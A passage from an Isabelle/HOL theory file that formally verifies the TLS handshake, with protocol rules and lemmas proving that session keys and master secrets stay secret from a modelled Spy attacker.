|]\n```\n``` 246 ==> Says A B (Crypt (clientK(NA,NB,M))\n```\n``` 247 (Hash\\<lbrace>Number SID, Nonce M,\n```\n``` 248 Nonce NA, Number PA, Agent A,\n```\n``` 249 Nonce NB, Number PB, Agent B\\<rbrace>))\n```\n``` 250 # evsCR \\<in> tls\"\n```\n``` 251\n```\n``` 252 | ServerResume:\n```\n``` 253 \\<comment>\\<open>Resumption (7.3): If B finds the \\<open>SESSION_ID\\<close> then he can\n```\n``` 254 send a FINISHED message using the recovered MASTER SECRET\\<close>\n```\n``` 255 \"[| evsSR \\<in> tls;\n```\n``` 256 Says A' B \\<lbrace>Agent A, Nonce NA, Number SID, Number PA\\<rbrace>: set evsSR;\n```\n``` 257 Says B A \\<lbrace>Nonce NB, Number SID, Number PB\\<rbrace> \\<in> set evsSR;\n```\n``` 258 Notes B \\<lbrace>Number SID, Agent A, Agent B, Nonce M\\<rbrace> \\<in> set evsSR |]\n```\n``` 259 ==> Says B A (Crypt (serverK(NA,NB,M))\n```\n``` 260 (Hash\\<lbrace>Number SID, Nonce M,\n```\n``` 261 Nonce NA, Number PA, Agent A,\n```\n``` 262 Nonce NB, Number PB, Agent B\\<rbrace>)) # evsSR\n```\n``` 263 \\<in> tls\"\n```\n``` 264\n```\n``` 265 | Oops:\n```\n``` 266 \\<comment>\\<open>The most plausible compromise is of an old session key. Losing\n```\n``` 267 the MASTER SECRET or PREMASTER SECRET is more serious but\n```\n``` 268 rather unlikely. The assumption @{term \"A\\<noteq>Spy\"} is essential:\n```\n``` 269 otherwise the Spy could learn session keys merely by\n```\n``` 270 replaying messages!\\<close>\n```\n``` 271 \"[| evso \\<in> tls; A \\<noteq> Spy;\n```\n``` 272 Says A B (Crypt (sessionK((NA,NB,M),role)) X) \\<in> set evso |]\n```\n``` 273 ==> Says A Spy (Key (sessionK((NA,NB,M),role))) # evso \\<in> tls\"\n```\n``` 274\n```\n``` 275 (*\n```\n``` 276 Protocol goals:\n```\n``` 277 * M, serverK(NA,NB,M) and clientK(NA,NB,M) will be known only to the two\n```\n``` 278 parties (though A is not necessarily authenticated).\n```\n``` 279\n```\n``` 280 * B upon receiving CertVerify knows that A is present (But this\n```\n``` 281 message is optional!)\n```\n``` 282\n```\n``` 283 * A upon receiving ServerFinished knows that B is present\n```\n``` 284\n```\n``` 285 * Each party who has received a FINISHED message can trust that the other\n```\n``` 286 party agrees on all message components, including PA and PB (thus foiling\n```\n``` 287 rollback attacks).\n```\n``` 288 *)\n```\n``` 289\n```\n``` 290 declare Says_imp_knows_Spy [THEN analz.Inj, dest]\n```\n``` 291 declare parts.Body [dest]\n```\n``` 292 declare analz_into_parts [dest]\n```\n``` 293 declare Fake_parts_insert_in_Un [dest]\n```\n``` 294\n```\n``` 295\n```\n``` 296 text\\<open>Automatically unfold the definition of \"certificate\"\\<close>\n```\n``` 297 declare certificate_def [simp]\n```\n``` 298\n```\n``` 299 text\\<open>Injectiveness of key-generating functions\\<close>\n```\n``` 300 declare inj_PRF [THEN inj_eq, iff]\n```\n``` 301 declare inj_sessionK [THEN inj_eq, iff]\n```\n``` 302 declare isSym_sessionK [simp]\n```\n``` 303\n```\n``` 304\n```\n``` 305 (*** clientK and serverK make symmetric keys; no clashes with pubK or priK ***)\n```\n``` 306\n```\n``` 307 lemma pubK_neq_sessionK [iff]: \"publicKey b A \\<noteq> sessionK arg\"\n```\n``` 308 by (simp add: symKeys_neq_imp_neq)\n```\n``` 309\n```\n``` 310 declare pubK_neq_sessionK [THEN not_sym, iff]\n```\n``` 311\n```\n``` 312 lemma priK_neq_sessionK [iff]: \"invKey (publicKey b A) \\<noteq> sessionK arg\"\n```\n``` 313 by (simp add: symKeys_neq_imp_neq)\n```\n``` 314\n```\n``` 315 declare priK_neq_sessionK [THEN not_sym, iff]\n```\n``` 316\n```\n``` 317 lemmas keys_distinct = pubK_neq_sessionK priK_neq_sessionK\n```\n``` 318\n```\n``` 319\n```\n``` 320 subsection\\<open>Protocol Proofs\\<close>\n```\n``` 321\n```\n``` 322 text\\<open>Possibility properties state that some traces run the protocol to the\n```\n``` 323 end. Four paths and 12 rules are considered.\\<close>\n```\n``` 324\n```\n``` 325\n```\n``` 326 (** These proofs assume that the Nonce_supply nonces\n```\n``` 327 (which have the form @ N. Nonce N \\<notin> used evs)\n```\n``` 328 lie outside the range of PRF. It seems reasonable, but as it is needed\n```\n``` 329 only for the possibility theorems, it is not taken as an axiom.\n```\n``` 330 **)\n```\n``` 331\n```\n``` 332\n```\n``` 333 text\\<open>Possibility property ending with ClientAccepts.\\<close>\n```\n``` 334 lemma \"[| \\<forall>evs. (@ N. Nonce N \\<notin> used evs) \\<notin> range PRF; A \\<noteq> B |]\n```\n``` 335 ==> \\<exists>SID M. \\<exists>evs \\<in> tls.\n```\n``` 336 Notes A \\<lbrace>Number SID, Agent A, Agent B, Nonce M\\<rbrace> \\<in> set evs\"\n```\n``` 337 apply (intro exI bexI)\n```\n``` 338 apply (rule_tac tls.Nil\n```\n``` 339 [THEN tls.ClientHello, THEN tls.ServerHello,\n```\n``` 340 THEN tls.Certificate, THEN tls.ClientKeyExch,\n```\n``` 341 THEN tls.ClientFinished, THEN tls.ServerFinished,\n```\n``` 342 THEN tls.ClientAccepts], possibility, blast+)\n```\n``` 343 done\n```\n``` 344\n```\n``` 345\n```\n``` 346 text\\<open>And one for ServerAccepts. Either FINISHED message may come first.\\<close>\n```\n``` 347 lemma \"[| \\<forall>evs. (@ N. Nonce N \\<notin> used evs) \\<notin> range PRF; A \\<noteq> B |]\n```\n``` 348 ==> \\<exists>SID NA PA NB PB M. \\<exists>evs \\<in> tls.\n```\n``` 349 Notes B \\<lbrace>Number SID, Agent A, Agent B, Nonce M\\<rbrace> \\<in> set evs\"\n```\n``` 350 apply (intro exI bexI)\n```\n``` 351 apply (rule_tac tls.Nil\n```\n``` 352 [THEN tls.ClientHello, THEN tls.ServerHello,\n```\n``` 353 THEN tls.Certificate, THEN tls.ClientKeyExch,\n```\n``` 354 THEN tls.ServerFinished, THEN tls.ClientFinished,\n```\n``` 355 THEN tls.ServerAccepts], possibility, blast+)\n```\n``` 356 done\n```\n``` 357\n```\n``` 358\n```\n``` 359 text\\<open>Another one, for CertVerify (which is optional)\\<close>\n```\n``` 360 lemma \"[| \\<forall>evs. (@ N. Nonce N \\<notin> used evs) \\<notin> range PRF; A \\<noteq> B |]\n```\n``` 361 ==> \\<exists>NB PMS. \\<exists>evs \\<in> tls.\n```\n``` 362 Says A B (Crypt (priK A) (Hash\\<lbrace>Nonce NB, Agent B, Nonce PMS\\<rbrace>))\n```\n``` 363 \\<in> set evs\"\n```\n``` 364 apply (intro exI bexI)\n```\n``` 365 apply (rule_tac tls.Nil\n```\n``` 366 [THEN tls.ClientHello, THEN tls.ServerHello,\n```\n``` 367 THEN tls.Certificate, THEN tls.ClientKeyExch,\n```\n``` 368 THEN tls.CertVerify], possibility, blast+)\n```\n``` 369 done\n```\n``` 370\n```\n``` 371\n```\n``` 372 text\\<open>Another one, for session resumption (both ServerResume and ClientResume).\n```\n``` 373 NO tls.Nil here: we refer to a previous session, not the empty trace.\\<close>\n```\n``` 374 lemma \"[| evs0 \\<in> tls;\n```\n``` 375 Notes A \\<lbrace>Number SID, Agent A, Agent B, Nonce M\\<rbrace> \\<in> set evs0;\n```\n``` 376 Notes B \\<lbrace>Number SID, Agent A, Agent B, Nonce M\\<rbrace> \\<in> set evs0;\n```\n``` 377 \\<forall>evs. (@ N. Nonce N \\<notin> used evs) \\<notin> range PRF;\n```\n``` 378 A \\<noteq> B |]\n```\n``` 379 ==> \\<exists>NA PA NB PB X. \\<exists>evs \\<in> tls.\n```\n``` 380 X = Hash\\<lbrace>Number SID, Nonce M,\n```\n``` 381 Nonce NA, Number PA, Agent A,\n```\n``` 382 Nonce NB, Number PB, Agent B\\<rbrace> &\n```\n``` 383 Says A B (Crypt (clientK(NA,NB,M)) X) \\<in> set evs &\n```\n``` 384 Says B A (Crypt (serverK(NA,NB,M)) X) \\<in> set evs\"\n```\n``` 385 apply (intro exI bexI)\n```\n``` 386 apply (rule_tac tls.ClientHello\n```\n``` 387 [THEN tls.ServerHello,\n```\n``` 388 THEN tls.ServerResume, THEN tls.ClientResume], possibility, blast+)\n```\n``` 389 done\n```\n``` 390\n```\n``` 391\n```\n``` 392 subsection\\<open>Inductive proofs about tls\\<close>\n```\n``` 393\n```\n``` 394\n```\n``` 395 (** Theorems of the form X \\<notin> parts (spies evs) imply that NOBODY\n```\n``` 396 sends messages containing X! **)\n```\n``` 397\n```\n``` 398 text\\<open>Spy never sees a good agent's private key!\\<close>\n```\n``` 399 lemma Spy_see_priK [simp]:\n```\n``` 400 \"evs \\<in> tls ==> (Key (privateKey b A) \\<in> parts (spies evs)) = (A \\<in> bad)\"\n```\n``` 401 by (erule tls.induct, force, simp_all, blast)\n```\n``` 402\n```\n``` 403 lemma Spy_analz_priK [simp]:\n```\n``` 404 \"evs \\<in> tls ==> (Key (privateKey b A) \\<in> analz (spies evs)) = (A \\<in> bad)\"\n```\n``` 405 by auto\n```\n``` 406\n```\n``` 407 lemma Spy_see_priK_D [dest!]:\n```\n``` 408 \"[|Key (privateKey b A) \\<in> parts (knows Spy evs); evs \\<in> tls|] ==> A \\<in> bad\"\n```\n``` 409 by (blast dest: Spy_see_priK)\n```\n``` 410\n```\n``` 411\n```\n``` 412 text\\<open>This lemma says that no false certificates exist. One might extend the\n```\n``` 413 model to include bogus certificates for the agents, but there seems\n```\n``` 414 little point in doing so: the loss of their private keys is a worse\n```\n``` 415 breach of security.\\<close>\n```\n``` 416 lemma certificate_valid:\n```\n``` 417 \"[| certificate B KB \\<in> parts (spies evs); evs \\<in> tls |] ==> KB = pubK B\"\n```\n``` 418 apply (erule rev_mp)\n```\n``` 419 apply (erule tls.induct, force, simp_all, blast)\n```\n``` 420 done\n```\n``` 421\n```\n``` 422 lemmas CX_KB_is_pubKB = Says_imp_spies [THEN parts.Inj, THEN certificate_valid]\n```\n``` 423\n```\n``` 424\n```\n``` 425 subsubsection\\<open>Properties of items found in Notes\\<close>\n```\n``` 426\n```\n``` 427 lemma Notes_Crypt_parts_spies:\n```\n``` 428 \"[| Notes A \\<lbrace>Agent B, X\\<rbrace> \\<in> set evs; evs \\<in> tls |]\n```\n``` 429 ==> Crypt (pubK B) X \\<in> parts (spies evs)\"\n```\n``` 430 apply (erule rev_mp)\n```\n``` 431 apply (erule tls.induct,\n```\n``` 432 frule_tac CX_KB_is_pubKB, force, simp_all)\n```\n``` 433 apply (blast intro: parts_insertI)\n```\n``` 434 done\n```\n``` 435\n```\n``` 436 text\\<open>C may be either A or B\\<close>\n```\n``` 437 lemma Notes_master_imp_Crypt_PMS:\n```\n``` 438 \"[| Notes C \\<lbrace>s, Agent A, Agent B, Nonce(PRF(PMS,NA,NB))\\<rbrace> \\<in> set evs;\n```\n``` 439 evs \\<in> tls |]\n```\n``` 440 ==> Crypt (pubK B) (Nonce PMS) \\<in> parts (spies evs)\"\n```\n``` 441 apply (erule rev_mp)\n```\n``` 442 apply (erule tls.induct, force, simp_all)\n```\n``` 443 txt\\<open>Fake\\<close>\n```\n``` 444 apply (blast intro: parts_insertI)\n```\n``` 445 txt\\<open>Client, Server Accept\\<close>\n```\n``` 446 apply (blast dest!: Notes_Crypt_parts_spies)+\n```\n``` 447 done\n```\n``` 448\n```\n``` 449 text\\<open>Compared with the theorem above, both premise and conclusion are stronger\\<close>\n```\n``` 450 lemma Notes_master_imp_Notes_PMS:\n```\n``` 451 \"[| Notes A \\<lbrace>s, Agent A, Agent B, Nonce(PRF(PMS,NA,NB))\\<rbrace> \\<in> set evs;\n```\n``` 452 evs \\<in> tls |]\n```\n``` 453 ==> Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evs\"\n```\n``` 454 apply (erule rev_mp)\n```\n``` 455 apply (erule tls.induct, force, simp_all)\n```\n``` 456 txt\\<open>ServerAccepts\\<close>\n```\n``` 457 apply blast\n```\n``` 458 done\n```\n``` 459\n```\n``` 460\n```\n``` 461 subsubsection\\<open>Protocol goal: if B receives CertVerify, then A sent it\\<close>\n```\n``` 462\n```\n``` 463 text\\<open>B can check A's signature if he has received A's certificate.\\<close>\n```\n``` 464 lemma TrustCertVerify_lemma:\n```\n``` 465 \"[| X \\<in> parts (spies evs);\n```\n``` 466 X = Crypt (priK A) (Hash\\<lbrace>nb, Agent B, pms\\<rbrace>);\n```\n``` 467 evs \\<in> tls; A \\<notin> bad |]\n```\n``` 468 ==> Says A B X \\<in> set evs\"\n```\n``` 469 apply (erule rev_mp, erule ssubst)\n```\n``` 470 apply (erule tls.induct, force, simp_all, blast)\n```\n``` 471 done\n```\n``` 472\n```\n``` 473 text\\<open>Final version: B checks X using the distributed KA instead of priK A\\<close>\n```\n``` 474 lemma TrustCertVerify:\n```\n``` 475 \"[| X \\<in> parts (spies evs);\n```\n``` 476 X = Crypt (invKey KA) (Hash\\<lbrace>nb, Agent B, pms\\<rbrace>);\n```\n``` 477 certificate A KA \\<in> parts (spies evs);\n```\n``` 478 evs \\<in> tls; A \\<notin> bad |]\n```\n``` 479 ==> Says A B X \\<in> set evs\"\n```\n``` 480 by (blast dest!: certificate_valid intro!: TrustCertVerify_lemma)\n```\n``` 481\n```\n``` 482\n```\n``` 483 text\\<open>If CertVerify is present then A has chosen PMS.\\<close>\n```\n``` 484 lemma UseCertVerify_lemma:\n```\n``` 485 \"[| Crypt (priK A) (Hash\\<lbrace>nb, Agent B, Nonce PMS\\<rbrace>) \\<in> parts (spies evs);\n```\n``` 486 evs \\<in> tls; A \\<notin> bad |]\n```\n``` 487 ==> Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evs\"\n```\n``` 488 apply (erule rev_mp)\n```\n``` 489 apply (erule tls.induct, force, simp_all, blast)\n```\n``` 490 done\n```\n``` 491\n```\n``` 492 text\\<open>Final version using the distributed KA instead of priK A\\<close>\n```\n``` 493 lemma UseCertVerify:\n```\n``` 494 \"[| Crypt (invKey KA) (Hash\\<lbrace>nb, Agent B, Nonce PMS\\<rbrace>)\n```\n``` 495 \\<in> parts (spies evs);\n```\n``` 496 certificate A KA \\<in> parts (spies evs);\n```\n``` 497 evs \\<in> tls; A \\<notin> bad |]\n```\n``` 498 ==> Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evs\"\n```\n``` 499 by (blast dest!: certificate_valid intro!: UseCertVerify_lemma)\n```\n``` 500\n```\n``` 501\n```\n``` 502 lemma no_Notes_A_PRF [simp]:\n```\n``` 503 \"evs \\<in> tls ==> Notes A \\<lbrace>Agent B, Nonce (PRF x)\\<rbrace> \\<notin> set evs\"\n```\n``` 504 apply (erule tls.induct, force, simp_all)\n```\n``` 505 txt\\<open>ClientKeyExch: PMS is assumed to differ from any PRF.\\<close>\n```\n``` 506 apply blast\n```\n``` 507 done\n```\n``` 508\n```\n``` 509\n```\n``` 510 lemma MS_imp_PMS [dest!]:\n```\n``` 511 \"[| Nonce (PRF (PMS,NA,NB)) \\<in> parts (spies evs); evs \\<in> tls |]\n```\n``` 512 ==> Nonce PMS \\<in> parts (spies evs)\"\n```\n``` 513 apply (erule rev_mp)\n```\n``` 514 apply (erule tls.induct, force, simp_all)\n```\n``` 515 txt\\<open>Fake\\<close>\n```\n``` 516 apply (blast intro: parts_insertI)\n```\n``` 517 txt\\<open>Easy, e.g. by freshness\\<close>\n```\n``` 518 apply (blast dest: Notes_Crypt_parts_spies)+\n```\n``` 519 done\n```\n``` 520\n```\n``` 521\n```\n``` 522\n```\n``` 523\n```\n``` 524 subsubsection\\<open>Unicity results for PMS, the pre-master-secret\\<close>\n```\n``` 525\n```\n``` 526 text\\<open>PMS determines B.\\<close>\n```\n``` 527 lemma Crypt_unique_PMS:\n```\n``` 528 \"[| Crypt(pubK B) (Nonce PMS) \\<in> parts (spies evs);\n```\n``` 529 Crypt(pubK B') (Nonce PMS) \\<in> parts (spies evs);\n```\n``` 530 Nonce PMS \\<notin> analz (spies evs);\n```\n``` 531 evs \\<in> tls |]\n```\n``` 532 ==> B=B'\"\n```\n``` 533 apply (erule rev_mp, erule rev_mp, erule rev_mp)\n```\n``` 534 apply (erule tls.induct, analz_mono_contra, force, simp_all (no_asm_simp))\n```\n``` 535 txt\\<open>Fake, ClientKeyExch\\<close>\n```\n``` 536 apply blast+\n```\n``` 537 done\n```\n``` 538\n```\n``` 539\n```\n``` 540 (** It is frustrating that we need two versions of the unicity results.\n```\n``` 541 But Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> determines both A and B. Sometimes\n```\n``` 542 we have only the weaker assertion Crypt(pubK B) (Nonce PMS), which\n```\n``` 543 determines B alone, and only if PMS is secret.\n```\n``` 544 **)\n```\n``` 545\n```\n``` 546 text\\<open>In A's internal Note, PMS determines A and B.\\<close>\n```\n``` 547 lemma Notes_unique_PMS:\n```\n``` 548 \"[| Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evs;\n```\n``` 549 Notes A' \\<lbrace>Agent B', Nonce PMS\\<rbrace> \\<in> set evs;\n```\n``` 550 evs \\<in> tls |]\n```\n``` 551 ==> A=A' & B=B'\"\n```\n``` 552 apply (erule rev_mp, erule rev_mp)\n```\n``` 553 apply (erule tls.induct, force, simp_all)\n```\n``` 554 txt\\<open>ClientKeyExch\\<close>\n```\n``` 555 apply (blast dest!: Notes_Crypt_parts_spies)\n```\n``` 556 done\n```\n``` 557\n```\n``` 558\n```\n``` 559 subsection\\<open>Secrecy Theorems\\<close>\n```\n``` 560\n```\n``` 561 text\\<open>Key compromise lemma needed to prove @{term analz_image_keys}.\n```\n``` 562 No collection of keys can help the spy get new private keys.\\<close>\n```\n``` 563 lemma analz_image_priK [rule_format]:\n```\n``` 564 \"evs \\<in> tls\n```\n``` 565 ==> \\<forall>KK. (Key(priK B) \\<in> analz (Key`KK Un (spies evs))) =\n```\n``` 566 (priK B \\<in> KK | B \\<in> bad)\"\n```\n``` 567 apply (erule tls.induct)\n```\n``` 568 apply (simp_all (no_asm_simp)\n```\n``` 569 del: image_insert\n```\n``` 570 add: image_Un [THEN sym]\n```\n``` 571 insert_Key_image Un_assoc [THEN sym])\n```\n``` 572 txt\\<open>Fake\\<close>\n```\n``` 573 apply spy_analz\n```\n``` 574 done\n```\n``` 575\n```\n``` 576\n```\n``` 577 text\\<open>slightly speeds up the big simplification below\\<close>\n```\n``` 578 lemma range_sessionkeys_not_priK:\n```\n``` 579 \"KK <= range sessionK ==> priK B \\<notin> KK\"\n```\n``` 580 by blast\n```\n``` 581\n```\n``` 582\n```\n``` 583 text\\<open>Lemma for the trivial direction of the if-and-only-if\\<close>\n```\n``` 584 lemma analz_image_keys_lemma:\n```\n``` 585 \"(X \\<in> analz (G Un H)) --> (X \\<in> analz H) ==>\n```\n``` 586 (X \\<in> analz (G Un H)) = (X \\<in> analz H)\"\n```\n``` 587 by (blast intro: analz_mono [THEN subsetD])\n```\n``` 588\n```\n``` 589 (** Strangely, the following version doesn't work:\n```\n``` 590 \\<forall>Z. (Nonce N \\<in> analz (Key`(sessionK`Z) Un (spies evs))) =\n```\n``` 591 (Nonce N \\<in> analz (spies evs))\"\n```\n``` 592 **)\n```\n``` 593\n```\n``` 594 lemma analz_image_keys [rule_format]:\n```\n``` 595 \"evs \\<in> tls ==>\n```\n``` 596 \\<forall>KK. KK <= range sessionK -->\n```\n``` 597 (Nonce N \\<in> analz (Key`KK Un (spies evs))) =\n```\n``` 598 (Nonce N \\<in> analz (spies evs))\"\n```\n``` 599 apply (erule tls.induct, frule_tac CX_KB_is_pubKB)\n```\n``` 600 apply (safe del: iffI)\n```\n``` 601 apply (safe del: impI iffI intro!: analz_image_keys_lemma)\n```\n``` 602 apply (simp_all (no_asm_simp) (*faster*)\n```\n``` 603 del: image_insert imp_disjL (*reduces blow-up*)\n```\n``` 604 add: image_Un [THEN sym] Un_assoc [THEN sym]\n```\n``` 605 insert_Key_singleton\n```\n``` 606 range_sessionkeys_not_priK analz_image_priK)\n```\n``` 607 apply (simp_all add: insert_absorb)\n```\n``` 608 txt\\<open>Fake\\<close>\n```\n``` 609 apply spy_analz\n```\n``` 610 done\n```\n``` 611\n```\n``` 612 text\\<open>Knowing some session keys is no help in getting new nonces\\<close>\n```\n``` 613 lemma analz_insert_key [simp]:\n```\n``` 614 \"evs \\<in> tls ==>\n```\n``` 615 (Nonce N \\<in> analz (insert (Key (sessionK z)) (spies evs))) =\n```\n``` 616 (Nonce N \\<in> analz (spies evs))\"\n```\n``` 617 by (simp del: image_insert\n```\n``` 618 add: insert_Key_singleton analz_image_keys)\n```\n``` 619\n```\n``` 620\n```\n``` 621 subsubsection\\<open>Protocol goal: serverK(Na,Nb,M) and clientK(Na,Nb,M) remain secure\\<close>\n```\n``` 622\n```\n``` 623 (** Some lemmas about session keys, comprising clientK and serverK **)\n```\n``` 624\n```\n``` 625\n```\n``` 626 text\\<open>Lemma: session keys are never used if PMS is fresh.\n```\n``` 627 Nonces don't have to agree, allowing session resumption.\n```\n``` 628 Converse doesn't hold; revealing PMS doesn't force the keys to be sent.\n```\n``` 629 THEY ARE NOT SUITABLE AS SAFE ELIM RULES.\\<close>\n```\n``` 630 lemma PMS_lemma:\n```\n``` 631 \"[| Nonce PMS \\<notin> parts (spies evs);\n```\n``` 632 K = sessionK((Na, Nb, PRF(PMS,NA,NB)), role);\n```\n``` 633 evs \\<in> tls |]\n```\n``` 634 ==> Key K \\<notin> parts (spies evs) & (\\<forall>Y. Crypt K Y \\<notin> parts (spies evs))\"\n```\n``` 635 apply (erule rev_mp, erule ssubst)\n```\n``` 636 apply (erule tls.induct, frule_tac CX_KB_is_pubKB)\n```\n``` 637 apply (force, simp_all (no_asm_simp))\n```\n``` 638 txt\\<open>Fake\\<close>\n```\n``` 639 apply (blast intro: parts_insertI)\n```\n``` 640 txt\\<open>SpyKeys\\<close>\n```\n``` 641 apply blast\n```\n``` 642 txt\\<open>Many others\\<close>\n```\n``` 643 apply (force dest!: Notes_Crypt_parts_spies Notes_master_imp_Crypt_PMS)+\n```\n``` 644 done\n```\n``` 645\n```\n``` 646 lemma PMS_sessionK_not_spied:\n```\n``` 647 \"[| Key (sessionK((Na, Nb, PRF(PMS,NA,NB)), role)) \\<in> parts (spies evs);\n```\n``` 648 evs \\<in> tls |]\n```\n``` 649 ==> Nonce PMS \\<in> parts (spies evs)\"\n```\n``` 650 by (blast dest: PMS_lemma)\n```\n``` 651\n```\n``` 652 lemma PMS_Crypt_sessionK_not_spied:\n```\n``` 653 \"[| Crypt (sessionK((Na, Nb, PRF(PMS,NA,NB)), role)) Y\n```\n``` 654 \\<in> parts (spies evs); evs \\<in> tls |]\n```\n``` 655 ==> Nonce PMS \\<in> parts (spies evs)\"\n```\n``` 656 by (blast dest: PMS_lemma)\n```\n``` 657\n```\n``` 658 text\\<open>Write keys are never sent if M (MASTER SECRET) is secure.\n```\n``` 659 Converse fails; betraying M doesn't force the keys to be sent!\n```\n``` 660 The strong Oops condition can be weakened later by unicity reasoning,\n```\n``` 661 with some effort.\n```\n``` 662 NO LONGER USED: see \\<open>clientK_not_spied\\<close> and \\<open>serverK_not_spied\\<close>\\<close>\n```\n``` 663 lemma sessionK_not_spied:\n```\n``` 664 \"[| \\<forall>A. Says A Spy (Key (sessionK((NA,NB,M),role))) \\<notin> set evs;\n```\n``` 665 Nonce M \\<notin> analz (spies evs); evs \\<in> tls |]\n```\n``` 666 ==> Key (sessionK((NA,NB,M),role)) \\<notin> parts (spies evs)\"\n```\n``` 667 apply (erule rev_mp, erule rev_mp)\n```\n``` 668 apply (erule tls.induct, analz_mono_contra)\n```\n``` 669 apply (force, simp_all (no_asm_simp))\n```\n``` 670 txt\\<open>Fake, SpyKeys\\<close>\n```\n``` 671 apply blast+\n```\n``` 672 done\n```\n``` 673\n```\n``` 674\n```\n``` 675 text\\<open>If A sends ClientKeyExch to an honest B, then the PMS will stay secret.\\<close>\n```\n``` 676 lemma Spy_not_see_PMS:\n```\n``` 677 \"[| Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evs;\n```\n``` 678 evs \\<in> tls; A \\<notin> bad; B \\<notin> bad |]\n```\n``` 679 ==> Nonce PMS \\<notin> analz (spies evs)\"\n```\n``` 680 apply (erule rev_mp, erule tls.induct, frule_tac CX_KB_is_pubKB)\n```\n``` 681 apply (force, simp_all (no_asm_simp))\n```\n``` 682 txt\\<open>Fake\\<close>\n```\n``` 683 apply spy_analz\n```\n``` 684 txt\\<open>SpyKeys\\<close>\n```\n``` 685 apply force\n```\n``` 686 apply (simp_all add: insert_absorb)\n```\n``` 687 txt\\<open>ClientHello, ServerHello, ClientKeyExch: mostly freshness reasoning\\<close>\n```\n``` 688 apply (blast dest: Notes_Crypt_parts_spies)\n```\n``` 689 apply (blast dest: Notes_Crypt_parts_spies)\n```\n``` 690 apply (blast dest: Notes_Crypt_parts_spies)\n```\n``` 691 txt\\<open>ClientAccepts and ServerAccepts: because @{term \"PMS \\<notin> range PRF\"}\\<close>\n```\n``` 692 apply force+\n```\n``` 693 done\n```\n``` 694\n```\n``` 695\n```\n``` 696 text\\<open>If A sends ClientKeyExch to an honest B, then the MASTER SECRET\n```\n``` 697 will stay secret.\\<close>\n```\n``` 698 lemma Spy_not_see_MS:\n```\n``` 699 \"[| Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evs;\n```\n``` 700 evs \\<in> tls; A \\<notin> bad; B \\<notin> bad |]\n```\n``` 701 ==> Nonce (PRF(PMS,NA,NB)) \\<notin> analz (spies evs)\"\n```\n``` 702 apply (erule rev_mp, erule tls.induct, frule_tac CX_KB_is_pubKB)\n```\n``` 703 apply (force, simp_all (no_asm_simp))\n```\n``` 704 txt\\<open>Fake\\<close>\n```\n``` 705 apply spy_analz\n```\n``` 706 txt\\<open>SpyKeys: by secrecy of the PMS, Spy cannot make the MS\\<close>\n```\n``` 707 apply (blast dest!: Spy_not_see_PMS)\n```\n``` 708 apply (simp_all add: insert_absorb)\n```\n``` 709 txt\\<open>ClientAccepts and ServerAccepts: because PMS was already visible;\n```\n``` 710 others, freshness etc.\\<close>\n```\n``` 711 apply (blast dest: Notes_Crypt_parts_spies Spy_not_see_PMS\n```\n``` 712 Notes_imp_knows_Spy [THEN analz.Inj])+\n```\n``` 713 done\n```\n``` 714\n```\n``` 715\n```\n``` 716\n```\n``` 717 subsubsection\\<open>Weakening the Oops conditions for leakage of clientK\\<close>\n```\n``` 718\n```\n``` 719 text\\<open>If A created PMS then nobody else (except the Spy in replays)\n```\n``` 720 would send a message using a clientK generated from that PMS.\\<close>\n```\n``` 721 lemma Says_clientK_unique:\n```\n``` 722 \"[| Says A' B' (Crypt (clientK(Na,Nb,PRF(PMS,NA,NB))) Y) \\<in> set evs;\n```\n``` 723 Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evs;\n```\n``` 724 evs \\<in> tls; A' \\<noteq> Spy |]\n```\n``` 725 ==> A = A'\"\n```\n``` 726 apply (erule rev_mp, erule rev_mp)\n```\n``` 727 apply (erule tls.induct, frule_tac CX_KB_is_pubKB)\n```\n``` 728 apply (force, simp_all)\n```\n``` 729 txt\\<open>ClientKeyExch\\<close>\n```\n``` 730 apply (blast dest!: PMS_Crypt_sessionK_not_spied)\n```\n``` 731 txt\\<open>ClientFinished, ClientResume: by unicity of PMS\\<close>\n```\n``` 732 apply (blast dest!: Notes_master_imp_Notes_PMS\n```\n``` 733 intro: Notes_unique_PMS [THEN conjunct1])+\n```\n``` 734 done\n```\n``` 735\n```\n``` 736\n```\n``` 737 text\\<open>If A created PMS and has not leaked her clientK to the Spy,\n```\n``` 738 then it is completely secure: not even in parts!\\<close>\n```\n``` 739 lemma clientK_not_spied:\n```\n``` 740 \"[| Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evs;\n```\n``` 741 Says A Spy (Key (clientK(Na,Nb,PRF(PMS,NA,NB)))) \\<notin> set evs;\n```\n``` 742 A \\<notin> bad; B \\<notin> bad;\n```\n``` 743 evs \\<in> tls |]\n```\n``` 744 ==> Key (clientK(Na,Nb,PRF(PMS,NA,NB))) \\<notin> parts (spies evs)\"\n```\n``` 745 apply (erule rev_mp, erule rev_mp)\n```\n``` 746 apply (erule tls.induct, frule_tac CX_KB_is_pubKB)\n```\n``` 747 apply (force, simp_all (no_asm_simp))\n```\n``` 748 txt\\<open>ClientKeyExch\\<close>\n```\n``` 749 apply blast\n```\n``` 750 txt\\<open>SpyKeys\\<close>\n```\n``` 751 apply (blast dest!: Spy_not_see_MS)\n```\n``` 752 txt\\<open>ClientKeyExch\\<close>\n```\n``` 753 apply (blast dest!: PMS_sessionK_not_spied)\n```\n``` 754 txt\\<open>Oops\\<close>\n```\n``` 755 apply (blast intro: Says_clientK_unique)\n```\n``` 756 done\n```\n``` 757\n```\n``` 758\n```\n``` 759 subsubsection\\<open>Weakening the Oops conditions for leakage of serverK\\<close>\n```\n``` 760\n```\n``` 761 text\\<open>If A created PMS for B, then nobody other than B or the Spy would\n```\n``` 762 send a message using a serverK generated from that PMS.\\<close>\n```\n``` 763 lemma Says_serverK_unique:\n```\n``` 764 \"[| Says B' A' (Crypt (serverK(Na,Nb,PRF(PMS,NA,NB))) Y) \\<in> set evs;\n```\n``` 765 Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evs;\n```\n``` 766 evs \\<in> tls; A \\<notin> bad; B \\<notin> bad; B' \\<noteq> Spy |]\n```\n``` 767 ==> B = B'\"\n```\n``` 768 apply (erule rev_mp, erule rev_mp)\n```\n``` 769 apply (erule tls.induct, frule_tac 